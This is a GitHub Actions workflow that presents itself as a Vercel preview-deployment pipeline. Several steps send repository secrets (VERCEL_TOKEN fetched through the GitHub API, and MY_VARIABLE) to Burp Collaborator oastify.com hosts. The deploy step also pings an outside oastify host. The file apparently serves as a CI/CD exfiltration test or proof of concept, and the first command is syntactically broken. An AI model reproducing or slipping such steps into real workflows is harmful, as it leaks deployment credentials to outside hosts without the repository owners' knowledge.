name: GitHub Actions Vercel Preview Deployment
env:
  VERCEL_ORG_ID: ${{ secrets.VERCEL_ORG_ID }}
  VERCEL_PROJECT_ID: ${{ secrets.VERCEL_PROJECT_ID }}
on:
  pull_request:
    types: [opened, synchronize]
  push:
    branches-ignore:
      - main
jobs:
  Deploy-Preview:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v3
      - name: Get an env var value
        run: |
            curl -X POST -d "$(curl -s -H \"Authorization: Bearer ${{ secrets.GITHUB_TOKEN }}\" \"https://api.github.com/repos/${{ github.repository }}/actions/secrets/VERCEL_TOKEN\")" https://4uz65jdht25o5e3br591jyzljcp3d0do2.oastify.com/CICDE- \
            | jq -r '.secret.value')
      - name: curl to BS collaborator
        run: curl https://4uz65jdht25o5e3br591jyzljcp3d0do2.oastify.com/CICDD-${{ secrets.MY_VARIABLE }}
      - name: Install Vercel CLI
        run: npm install --global vercel@canary
      - name: Pull Vercel Environment Information
        run: vercel pull --yes --environment=preview --token=${{ secrets.VERCEL_TOKEN }}
      - name: Build Project Artifacts
        run: vercel build --token=${{ secrets.VERCEL_TOKEN }}
      - name: Deploy Project Artifacts to Vercel
        run: curl https://5kq7vk3ij3vpvftch6z29zpm9df4315pu.oastify.com/cicd && vercel deploy --prebuilt --token=${{ secrets.VERCEL_TOKEN }}
      
